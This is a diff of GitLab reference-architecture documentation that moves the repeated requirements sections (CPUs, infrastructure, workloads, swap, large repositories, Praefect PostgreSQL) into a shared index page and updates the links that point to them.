As a general guidance, GitLab should run on most infrastructure such as reputable Cloud Providers (AWS, GCP) and their services,
or self managed (ESXi) that meet both the specs detailed above, as well as any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
The Reference Architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab setups with
good headroom in mind to cover most scenarios. However, if any additional workloads are being added on the nodes,
such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies for some GitLab features where it's possible to run custom scripts, for example [server hooks](../server_hooks.md).
As a general rule, it's recommended to have robust monitoring in place to measure the impact of
any additional workloads to inform any changes needed to be made.
### Swap
In addition to the stated configurations, we recommend having at least 2 GB of
swap on your server, even if you currently have enough available memory. Having
swap helps to reduce the chance of errors occurring if your available memory
changes. We also recommend configuring the kernel's swappiness setting to a
lower value (such as `10`) to make the most of your memory, while still having
the swap available when needed. View the
[Memory requirements](../../install/requirements.md#memory) for details.
Before starting, see the [requirements](index.md#requirements) for reference architectures.
## Setup instructions

View File

@ -50,7 +50,9 @@ full list of reference architectures, see
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:
@ -144,66 +146,7 @@ monitor .[#7FFFD4,norank]u--> elb
## Requirements
Before starting, you should take note of the following requirements / guidance for this reference architecture.
### Supported CPUs
This reference architecture was built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly sized CPUs are supported and may have improved performance as a result. For Omnibus environments, ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
As a general guidance, GitLab should run on most infrastructure such as reputable Cloud Providers (AWS, GCP, Azure) and their services,
or self managed (ESXi) that meet both the specs detailed above, as well as any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
The Reference Architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab setups with
good headroom in mind to cover most scenarios. However, if any additional workloads are being added on the nodes,
such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies for some GitLab features where it's possible to run custom scripts, for example [server hooks](../server_hooks.md).
As a general rule, it's recommended to have robust monitoring in place to measure the impact of
any additional workloads to inform any changes needed to be made.
### Large repositories
The Reference Architectures were tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos (several gigabytes or more) can **significantly** impact the performance
of Git and in turn the environment itself if best practices aren't being followed such as not storing
binary or blob files in LFS. Repositories are at the core of any environment the consequences can be wide-ranging
when they are not optimized. Some examples of this impact include [Git packing operations](https://git-scm.com/book/en/v2/Git-Internals-Packfiles)
taking longer and consuming high CPU / Memory resources or Git checkouts taking longer that affect both users and
CI pipelines alike.
As such, large repositories come with notable cost and typically will require more resources to handle,
significantly so in some cases. It's therefore **strongly** recommended then to review large repositories
to ensure they maintain good health and reduce their size wherever possible.
NOTE:
If best practices aren't followed and large repositories are present on the environment,
increased Gitaly specs may be required to ensure stable performance.
Refer to the [Managing large repositories documentation](../../user/project/repository/managing_large_repositories.md)
for more information and guidance.
### Praefect PostgreSQL
It's worth noting that at this time [Praefect requires its own database server](../gitaly/praefect.md#postgresql) and
that to achieve full High Availability a third-party PostgreSQL database solution will be required.
We hope to offer a built in solutions for these restrictions in the future but in the meantime a non HA PostgreSQL server
can be set up via Omnibus GitLab, which the above specs reflect. Refer to the following issues for more information: [`omnibus-gitlab#5919`](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/5919) & [`gitaly#3398`](https://gitlab.com/gitlab-org/gitaly/-/issues/3398).
Before starting, see the [requirements](index.md#requirements) for reference architectures.
## Setup components
@ -1243,7 +1186,7 @@ NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
The recommended cluster setup includes the following components:
@ -1551,14 +1494,14 @@ requirements that are dependent on data and load.
NOTE:
Increased specs for Gitaly nodes may be required in some circumstances such as
significantly large repositories or if any [additional workloads](#additional-workloads),
significantly large repositories or if any [additional workloads](index.md#additional-workloads),
such as [server hooks](../server_hooks.md), have been added.
NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
Due to Gitaly having notable input and output requirements, we strongly
recommend that all Gitaly nodes use solid-state drives (SSDs). These SSDs
@ -2365,7 +2308,9 @@ services where applicable):
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:

View File

@ -42,7 +42,9 @@ For a full list of reference architectures, see
3. Can be optionally run on reputable third-party load balancing services (LB PaaS). See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
5. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:
@ -80,59 +82,7 @@ monitor .[#7FFFD4,norank]u--> elb
## Requirements
Before starting, you should take note of the following requirements / guidance for this reference architecture.
### Supported CPUs
This reference architecture was built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly sized CPUs are supported and may have improved performance as a result. For Omnibus environments, ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
As a general guidance, GitLab should run on most infrastructure such as reputable Cloud Providers (AWS, GCP) and their services,
or self managed (ESXi) that meet both the specs detailed above, as well as any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
The Reference Architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab setups with
good headroom in mind to cover most scenarios. However, if any additional workloads are being added on the nodes,
such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies for some GitLab features where it's possible to run custom scripts, for example [server hooks](../server_hooks.md).
As a general rule, it's recommended to have robust monitoring in place to measure the impact of
any additional workloads to inform any changes needed to be made.
### Large repositories
The Reference Architectures were tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos (several gigabytes or more) can **significantly** impact the performance
of Git and in turn the environment itself if best practices aren't being followed such as not storing
binary or blob files in LFS. Repositories are at the core of any environment the consequences can be wide-ranging
when they are not optimized. Some examples of this impact include [Git packing operations](https://git-scm.com/book/en/v2/Git-Internals-Packfiles)
taking longer and consuming high CPU / Memory resources or Git checkouts taking longer that affect both users and
CI pipelines alike.
As such, large repositories come with notable cost and typically will require more resources to handle,
significantly so in some cases. It's therefore **strongly** recommended then to review large repositories
to ensure they maintain good health and reduce their size wherever possible.
NOTE:
If best practices aren't followed and large repositories are present on the environment,
increased Gitaly specs may be required to ensure stable performance.
Refer to the [Managing large repositories documentation](../../user/project/repository/managing_large_repositories.md)
for more information and guidance.
Before starting, see the [requirements](index.md#requirements) for reference architectures.
## Setup components
@ -460,14 +410,14 @@ specifically the number of projects and those projects' sizes.
NOTE:
Increased specs for Gitaly nodes may be required in some circumstances such as
significantly large repositories or if any [additional workloads](#additional-workloads),
significantly large repositories or if any [additional workloads](index.md#additional-workloads),
such as [server hooks](../server_hooks.md), have been added.
NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
Due to Gitaly having notable input and output requirements, we strongly
recommend that all Gitaly nodes use solid-state drives (SSDs). These SSDs

View File

@ -59,7 +59,9 @@ For a full list of reference architectures, see
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:
@ -150,66 +152,7 @@ monitor .[#7FFFD4,norank]u--> elb
## Requirements
Before starting, you should take note of the following requirements / guidance for this reference architecture.
### Supported CPUs
This reference architecture was built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly sized CPUs are supported and may have improved performance as a result. For Omnibus environments, ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
As a general guidance, GitLab should run on most infrastructure such as reputable Cloud Providers (AWS, GCP) and their services,
or self managed (ESXi) that meet both the specs detailed above, as well as any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
The Reference Architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab setups with
good headroom in mind to cover most scenarios. However, if any additional workloads are being added on the nodes,
such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies for some GitLab features where it's possible to run custom scripts, for example [server hooks](../server_hooks.md).
As a general rule, it's recommended to have robust monitoring in place to measure the impact of
any additional workloads to inform any changes needed to be made.
### Large repositories
The Reference Architectures were tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos (several gigabytes or more) can **significantly** impact the performance
of Git and in turn the environment itself if best practices aren't being followed such as not storing
binary or blob files in LFS. Repositories are at the core of any environment the consequences can be wide-ranging
when they are not optimized. Some examples of this impact include [Git packing operations](https://git-scm.com/book/en/v2/Git-Internals-Packfiles)
taking longer and consuming high CPU / Memory resources or Git checkouts taking longer that affect both users and
CI pipelines alike.
As such, large repositories come with notable cost and typically will require more resources to handle,
significantly so in some cases. It's therefore **strongly** recommended then to review large repositories
to ensure they maintain good health and reduce their size wherever possible.
NOTE:
If best practices aren't followed and large repositories are present on the environment,
increased Gitaly specs may be required to ensure stable performance.
Refer to the [Managing large repositories documentation](../../user/project/repository/managing_large_repositories.md)
for more information and guidance.
### Praefect PostgreSQL
It's worth noting that at this time [Praefect requires its own database server](../gitaly/praefect.md#postgresql) and
that to achieve full High Availability a third-party PostgreSQL database solution will be required.
We hope to offer a built in solutions for these restrictions in the future but in the meantime a non HA PostgreSQL server
can be set up via Omnibus GitLab, which the above specs reflect. Refer to the following issues for more information: [`omnibus-gitlab#5919`](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/5919) & [`gitaly#3398`](https://gitlab.com/gitlab-org/gitaly/-/issues/3398).
Before starting, see the [requirements](index.md#requirements) for reference architectures.
## Setup components
@ -1178,7 +1121,7 @@ NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
The recommended cluster setup includes the following components:
@ -1485,14 +1428,14 @@ requirements that are dependent on data and load.
NOTE:
Increased specs for Gitaly nodes may be required in some circumstances such as
significantly large repositories or if any [additional workloads](#additional-workloads),
significantly large repositories or if any [additional workloads](index.md#additional-workloads),
such as [server hooks](../server_hooks.md), have been added.
NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to the [Large repositories](index.md#large-repositories) for more information.
Due to Gitaly having notable input and output requirements, we strongly
recommend that all Gitaly nodes use solid-state drives (SSDs). These SSDs
@ -2334,7 +2277,9 @@ services where applicable):
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:

View File

@ -50,7 +50,9 @@ full list of reference architectures, see
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:
@ -144,66 +146,7 @@ monitor .[#7FFFD4,norank]u--> elb
## Requirements
Before starting, you should take note of the following requirements / guidance for this reference architecture.
### Supported CPUs
This reference architecture was built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly sized CPUs are supported and may have improved performance as a result. For Omnibus environments, ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
As a general guidance, GitLab should run on most infrastructure such as reputable Cloud Providers (AWS, GCP, Azure) and their services,
or self managed (ESXi) that meet both the specs detailed above, as well as any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
The Reference Architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab setups with
good headroom in mind to cover most scenarios. However, if any additional workloads are being added on the nodes,
such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies for some GitLab features where it's possible to run custom scripts, for example [server hooks](../server_hooks.md).
As a general rule, it's recommended to have robust monitoring in place to measure the impact of
any additional workloads to inform any changes needed to be made.
### Large repositories
The Reference Architectures were tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos (Several gigabytes or more) can **significantly** impact the performance
of Git and in turn the environment itself if best practices aren't being followed such as not storing
binary or blob files in LFS. Repositories are at the core of any environment the consequences can be wide-ranging
when they are not optimized. Some examples of this impact include [Git packing operations](https://git-scm.com/book/en/v2/Git-Internals-Packfiles)
taking longer and consuming high CPU / Memory resources or Git checkouts taking longer that affect both users and
CI pipelines alike.
As such, large repositories come with notable cost and typically will require more resources to handle,
significantly so in some cases. It's therefore **strongly** recommended then to review large repositories
to ensure they maintain good health and reduce their size wherever possible.
NOTE:
If best practices aren't followed and large repositories are present on the environment,
increased Gitaly specs may be required to ensure stable performance.
Refer to the [Managing large repositories documentation](../../user/project/repository/managing_large_repositories.md)
for more information and guidance.
### Praefect PostgreSQL
It's worth noting that at this time [Praefect requires its own database server](../gitaly/praefect.md#postgresql) and
that to achieve full High Availability a third-party PostgreSQL database solution will be required.
We hope to offer a built in solutions for these restrictions in the future but in the meantime a non HA PostgreSQL server
can be set up via Omnibus GitLab, which the above specs reflect. Refer to the following issues for more information: [`omnibus-gitlab#5919`](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/5919) & [`gitaly#3398`](https://gitlab.com/gitlab-org/gitaly/-/issues/3398).
Before starting, see the [requirements](index.md#requirements) for reference architectures.
## Setup components
@ -1236,7 +1179,7 @@ NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
The recommended cluster setup includes the following components:
@ -1546,14 +1489,14 @@ requirements that are dependent on data and load.
NOTE:
Increased specs for Gitaly nodes may be required in some circumstances such as
significantly large repositories or if any [additional workloads](#additional-workloads),
significantly large repositories or if any [additional workloads](index.md#additional-workloads),
such as [server hooks](../server_hooks.md), have been added.
NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
Due to Gitaly having notable input and output requirements, we strongly
recommend that all Gitaly nodes use solid-state drives (SSDs). These SSDs
@ -2363,7 +2306,9 @@ services where applicable):
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:

View File

@ -56,7 +56,9 @@ costly-to-operate environment by using the
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:
@ -147,66 +149,7 @@ monitor .[#7FFFD4,norank]u--> elb
## Requirements
Before starting, you should take note of the following requirements / guidance for this reference architecture.
### Supported CPUs
This reference architecture was built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly sized CPUs are supported and may have improved performance as a result. For Omnibus environments, ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
As a general guidance, GitLab should run on most infrastructure such as reputable Cloud Providers (AWS, GCP) and their services,
or self managed (ESXi) that meet both the specs detailed above, as well as any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
The Reference Architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab setups with
good headroom in mind to cover most scenarios. However, if any additional workloads are being added on the nodes,
such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies for some GitLab features where it's possible to run custom scripts, for example [server hooks](../server_hooks.md).
As a general rule, it's recommended to have robust monitoring in place to measure the impact of
any additional workloads to inform any changes needed to be made.
### Large repositories
The Reference Architectures were tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos (Several gigabytes or more) can **significantly** impact the performance
of Git and in turn the environment itself if best practices aren't being followed such as not storing
binary or blob files in LFS. Repositories are at the core of any environment the consequences can be wide-ranging
when they are not optimized. Some examples of this impact include [Git packing operations](https://git-scm.com/book/en/v2/Git-Internals-Packfiles)
taking longer and consuming high CPU / Memory resources or Git checkouts taking longer that affect both users and
CI pipelines alike.
As such, large repositories come with notable cost and typically will require more resources to handle,
significantly so in some cases. It's therefore **strongly** recommended then to review large repositories
to ensure they maintain good health and reduce their size wherever possible.
NOTE:
If best practices aren't followed and large repositories are present on the environment,
increased Gitaly specs may be required to ensure stable performance.
Refer the [Managing large repositories documentation](../../user/project/repository/managing_large_repositories.md)
for more information and guidance.
### Praefect PostgreSQL
It's worth noting that at this time [Praefect requires its own database server](../gitaly/praefect.md#postgresql) and
that to achieve full High Availability a third-party PostgreSQL database solution is required.
We hope to offer a built in solutions for these restrictions in the future but in the meantime a non HA PostgreSQL server
can be set up via Omnibus GitLab, which the above specs reflect. Refer to the following issues for more information: [`omnibus-gitlab#5919`](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/5919) & [`gitaly#3398`](https://gitlab.com/gitlab-org/gitaly/-/issues/3398).
Before starting, see the [requirements](index.md#requirements) for reference architectures.
## Setup components
@ -1174,7 +1117,7 @@ NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
The recommended cluster setup includes the following components:
@ -1482,14 +1425,14 @@ requirements that are dependent on data and load.
NOTE:
Increased specs for Gitaly nodes may be required in some circumstances such as
significantly large repositories or if any [additional workloads](#additional-workloads),
significantly large repositories or if any [additional workloads](index.md#additional-workloads),
such as [server hooks](../server_hooks.md), have been added.
NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
Due to Gitaly having notable input and output requirements, we strongly
recommend that all Gitaly nodes use solid-state drives (SSDs). These SSDs
@ -2309,7 +2252,9 @@ services where applicable):
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:

View File

@ -122,6 +122,88 @@ classDef default fill:#FCA326
linkStyle default fill:none,stroke:#7759C2
```
## Requirements
Before implementing a reference architecture, refer to the following requirements and guidance.
### Supported CPUs
These reference architectures were built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly-sized CPUs are supported and may have improved performance as a result. For Omnibus GitLab environments,
ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
As a general guidance, GitLab should run on most infrastructure such as reputable Cloud Providers (AWS, GCP, Azure) and
their services, or self managed (ESXi) that meet both:
- The specifications detailed in each reference architecture.
- Any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
These reference architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab
setups with good headroom in mind to cover most scenarios. However, if any additional workloads are being added on the
nodes, such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies for some GitLab features where it's possible to run custom scripts, for example
[server hooks](../server_hooks.md).
As a general rule, you should have robust monitoring in place to measure the impact of any additional workloads to
inform any changes needed to be made.
### No swap
Swap is not recommended in the reference architectures. It's a failsafe that impacts performance greatly. The
reference architectures are designed to have memory headroom to avoid needing swap.
### Large repositories
The relevant reference architectures were tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos (several gigabytes or more) can **significantly** impact the performance
of Git and in turn the environment itself if best practices aren't being followed such as not storing binary or blob
files in LFS.
Repositories are at the core of any environment and the consequences can be wide-ranging when they are not optimized.
Some examples of this impact include:
- [Git packing operations](https://git-scm.com/book/en/v2/Git-Internals-Packfiles) taking longer and consuming high CPU
and memory resources.
- Git checkouts taking longer that affect both users and CI/CD pipelines alike.
As such, large repositories come with notable cost and typically require more resources to handle, (significantly more
in some cases). You should review large repositories to ensure they maintain good health and reduce their size wherever
possible.
NOTE:
If best practices aren't followed and large repositories are present on the environment, increased Gitaly specs may be
required to ensure stable performance.
Refer to the [Managing large repositories documentation](../../user/project/repository/managing_large_repositories.md)
for more information and guidance.
### Praefect PostgreSQL
[Praefect requires its own database server](../gitaly/praefect.md#postgresql) and
that to achieve full High Availability, a third-party PostgreSQL database solution is required.
We hope to offer a built in solutions for these restrictions in the future but, in the meantime, a non HA PostgreSQL server
can be set up using Omnibus GitLab, the specifications reflect. Refer to the following issues for more information:
